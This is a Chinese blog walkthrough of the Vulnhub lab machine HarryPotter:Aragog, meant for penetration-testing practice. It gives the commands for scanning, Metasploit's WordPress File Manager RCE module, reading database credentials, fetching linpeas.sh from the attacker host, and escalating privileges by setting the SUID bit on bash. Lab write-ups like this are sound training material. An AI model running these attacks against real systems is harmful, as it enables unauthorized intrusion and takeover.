看完这篇 教你玩转渗透测试靶机Vulnhub——HarryPotter:Aragog(1.0.2)

最新推荐文章于 2024-01-23 20:49:15 发布
最新推荐文章于 2024-01-23 20:49:15 发布
阅读量675 收藏 2
点赞数 5
分类专栏: 渗透测试 # Vulnhub靶场 文章标签: linpeas.sh Vulnhub靶机 HarryPotter系列 Aragog MSF框架
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aluxian_/article/details/131639531
版权

Vulnhub靶机HarryPotter:Aragog渗透测试详解

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

PS:这个是HarryPotter(哈利波特)系列一共有三个靶机,先来第一个Aragog老样子需要获得root权限找到flag(这里是魂器)即可。

在这里插入图片描述

Vulnhub靶机下载:

官网下载:https://download.vulnhub.com/harrypotter/Aragog-1.0.2.ova

Vulnhub靶机安装:

下载好了把安装包解压 然后使用Oracle VM打开即可。

在这里插入图片描述

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用arp-scan -l或者netdiscover发现主机

在这里插入图片描述

渗透机:kali IP :192.168.0.105 靶机IP :192.168.0.103

使用命令:nmap -sS -sV -A -n -p- 192.168.0.103

在这里插入图片描述
发现开启了2280端口,先访问一下哈利波特(经典再现)🆗还是老样子dirb、dirsearch、whatweb、gobuster、nikto

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
这里我们扫到了一堆/blog/子目录还有后台一看就是WordPresscms的框架🆗 这里可以使用一个工具 wpscan

②:漏洞发现:

WPScan是一个扫描WordPress漏洞的黑盒子扫描器,可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等,Kali Linux默认自带了WPScan 可以-h 查看具体用法参数

在这里插入图片描述

wpscan --api-token=自己的值 --url=http://192.168.0.103/blog -e vp  #记得自己注册个账号拿api-token的值 不然扫描不会显示漏洞信息的

在这里插入图片描述
其实就有关于file Manager的 我们可以使用MSF去测试一下

③:漏洞利用:
search wordpress file manager #搜索manager相关漏洞信息
use  exploit/multi/http/wp_file_manager_rce #使用模块
show options  #查看需要的设置的参数
set RHOST 192.168.0.103  #设置靶机ip
set LHOST 192.168.0.105   #设置本地ip
set payload  #可以设置 可以不设
set TARGETURI /blog
run  #运行即可

在这里插入图片描述
在这里插入图片描述
🆗这里就渗透进来了,在/home 下面的 hagrid98文件下发现第一个魂器base64解码即可。

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

④:数据库语句查询:

🆗这里我们找到了第一个魂器 使用 getuid 发现权限比较低 这里我们的思路就是需要提权操作了!

思路:wordpress用户会在mysql数据库中存储信息,在/etc/wordpress里可以打开config-default.php

在这里插入图片描述
在这里插入图片描述
得到账号和密码:root/mySecr3tPass

python3 -c 'import pty; pty.spawn("bin.bash");'  #开启交互
mysql -u root -p  #登入数据库
show databases;  #列出库
use wordpress;  #使用wordpress库
show tables;  #查询表
select * from wp_users; #查询表内容

在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
然后MD5解码得到密码:password123

MD5在线解密:https://www.somd5.com/

在这里插入图片描述

⑤:SSH登入:

得到了账号密码:hagrid98/password123 尝试登入,登入成功!!!

在这里插入图片描述
在这里插入图片描述

⑥:备份文件提权:

这里需要下载 linpeas.sh 用于辅助提权的开启临时网页:python3 -m http.server 9000 在使用wget下载到靶机

linpeas.sh下载地址:https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

wget http://192.168.0.105:9000/linpeas.sh  #wget 下载到靶机
chmod 777 linpeas.sh # 给个权限
./linpeas.sh #运行 进行扫描

在这里插入图片描述
在这里插入图片描述
扫描发现有backup备份文件,这个脚本的意思就是把上传的文件复制到/tmp 然后过段时间会执行。

在这里插入图片描述
在这里插入图片描述
这里可以继续传pspy64用来看定时任务的(我懒得传了,大晚上肝文章要睡觉着了)直接为可以执行bash就行了

在这里插入图片描述

chmod +s /usr/bin/bash #给个权限
/usr/bin/bash -p  #执行bash
⑦:获取FLAG:

在这里插入图片描述
base64解码即可。

在这里插入图片描述
在这里插入图片描述

剩下得魂器 下次探索吧!已经凌晨 20分钟了 狗命要紧!!

至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!

Vulnhub靶机渗透总结:

这个靶机难度高,主要i是最后得提权吧

1.信息收集arp-scan -l 获取ip地址 和端口信息 web扫描工具:nikto,dirb,dirbuster,whatweb,ffuf
2.数据库的基本操作 查询语句 select * from python3开启交互 以及开临时网页(最基本的讲过很多次了)
3.wpscan工具的使用 探测WordPress 框架
4.MSF框架:exploit/multi/http/wp_file_manager_rce的使用
5.linpeas.sh辅助提权的使用,查询定时任务pspy64 备份文件提权

HarryPotter系列第一个靶机,学习到了很多知识点又是收获满满的一天(耶耶耶!)
最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

落寞的魚丶
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
靶机ARAGOG (1.0.2)
Tswcbyy_hp的博客
07-21 436
实验环境 主机 ip 攻击机 192.168.48.128 靶机 192.168.48.136 攻击过程 信息收集 扫描网段,找到目标靶机的IP地址 详细扫描端口,发现打开了两个端口,22和80 有80端口,肯定有个网站,在浏览器打开网站 只有一个霍格瓦茨魔法学院大战图 dirb扫描网络,找到不少地址 漏洞利用 打开第一个目录blog 看到的是wordpress的blog网站 点击notice,提示说未知的host 可以看到除了主页以外,其余所有的网站都要访问这个host
VulnHub靶场】——HARRYPOTTER第一部: ARAGOG (1.0.2)
Demo不是emo的博客
09-30 3146
​ 今天的博客内容是HARRYPOTTER: ARAGOG (1.0.2)程(简单难度),靶场环境来源于VulnHub,该网站有很多虚拟机靶场,靶场平台入口在这,推荐大家使用,大家进去直接搜索HARRYPOTTER: ARAGOG (1.0.2)就能下载今天的靶场了,也可以找我拿,开始对今天靶场的介绍 ​
Vulnhub】之Aragog-1.0.2
zg_111的博客
04-11 700
wordpress搭建的网站数据库账号密码会记录在/etc/wordpress目录里的config-default.php 文件里,查看后发现了数据库的root密码。所以我们到目录/tmp下写一个反弹shell的php脚本,然后修改.backup.sh脚本内容。浏览了下页面,发现没有可利用的点,但是我们能发现这个站点是利用wordpress搭建的。继续查看目录文件,我们在/opt目录下发现一个隐藏的脚本文件:.backup.sh。等待片刻,成功获取到root权限,并在root目录下发现了。
Vulnhub靶机下载使用
laoyanCZ的博客
11-26 954
一、何为Virtualbox? ​​​​​Virtualbox跟Vmware一样,是创建虚拟机的软件,两者的功能基本上是一样的。 那我们为什么要安装Virtualbox呢?因为Vulnhub上面的靶机在导入到Virtualbox会稳定一些,基本上不会出现什么兼容性的问题,而导入到Vmware可能会报一些错误,就导致我们无法正常导入,所以我们一般都用Virtualbox来打开Vulnhub上的靶机。二、博主的渗透环境 博主一般都是习惯于kali安装在Vmware里面,
Grotesque:3.0.1 vulnhub靶场(papy64,linpeas.sh)
weixin_62621015的博客
04-03 486
Grotesque:3.0.1 vulnhub靶场(papy64,linpeas.sh)
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
提权信息收集自动化脚本-LinPEAS
04-10
该工具是纯bash脚本,通用性很好,能够收集上述几乎所有的提权信息,足够全面。但运行时间长,效率低,得到的信息虽然全面,但重点不够突出,有较多无用信息,稍显冗杂。 使用方式为: ./linpeas.sh
Exploits:LinuxWindows漏洞利用
04-16
漏洞利用 卡利Linux 安装终结者 sudo apt-get update sudo apt-get install terminator 使用终止符 #Start Terminator #horizontal break ctrl+shift+e #Vertical break ctrl+shift+o 安装/下载linpeas.sh(系统检查器) Download linpeas.sh (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/lin
工具箱:CTF工具箱
02-14
工具箱 当前,工具箱提供的功能类似于python3 -m http.server ,它将: 在提供的目录中提供文件 服务常用的CTF工具,例如linpeas.sh和静态二进制文件 服务有效载荷/外壳生成 正在安装 git clone https://github.com/AlanFoster/toolbox.git 安装依赖项: cd toolbox git submodule update --init --recursive pip3 install -r requirements.txt 验证它是否有效: python3 toolbox.py --help 使用Docker 构建图像: docker build -t toolbox . 用法示例: docker run -it --rm -p 8000:8000 toolbox /bin/sh -c "python to
对DriftingBlues-6靶机进行渗透测试
zll___的博客
04-20 571
对DriftingBlues-6靶机进行渗透测试
对Matrix-Breakout-2-Morpheus靶机进行渗透测试
zll___的博客
03-27 725
对Matrix-Breakout-2-Morpheus靶机进行渗透测试
Linpeas的简单使用
Themanager112的博客
01-06 1496
是一个流行的脚本,用于在渗透测试中进行特权升级和系统枚举。要在 Kali Linux 中使用。在没有授权的情况下对系统运行渗透测试工具可能违法。并不是预装的工具,因此你不会在标准安装中找到它。,你需要手动下载和运行它。: 你可以从其 GitHub 仓库下载。请确保在合法和授权的环境中使用。在 Kali Linux 中,
文件上传漏之Durian靶场练习(整版)——学习日记-渗透day14
qq_62716256的博客
09-14 1944
文件上传漏之Durian靶场练习(整版)——学习日记-渗透day14
VulnHub靶场】——HARRYPOTTER第一部- ARAGOG (1.0.2)
最新发布
qq_53058639的博客
01-23 933
作者名:Demo不是emo主页面链接: ****创作初心:对于计算机的学习者来说,初期的学习无疑是最迷茫和难以坚持的,我也刚接触计算机1年,也在不断的探索,在CSDN写博客主要是为了分享自己的学习历程,学习方法,总结的经验等等,希望能帮助到大家座右铭:不要让时代的悲哀成为你的悲哀专研方向:网络安全,数据结构每日emo:人们感到委屈的时候通常就说睡了!今天的博客内容是程(),靶场环境来源于,该网站有很多虚拟机靶场,在这,推荐大家使用,大家进去直接搜索就能下载今天的靶场了,
vulnhub靶机——raven: 2
09-03
你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference_title] - *1* [vulnhub靶机raven2]...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

落寞的魚丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值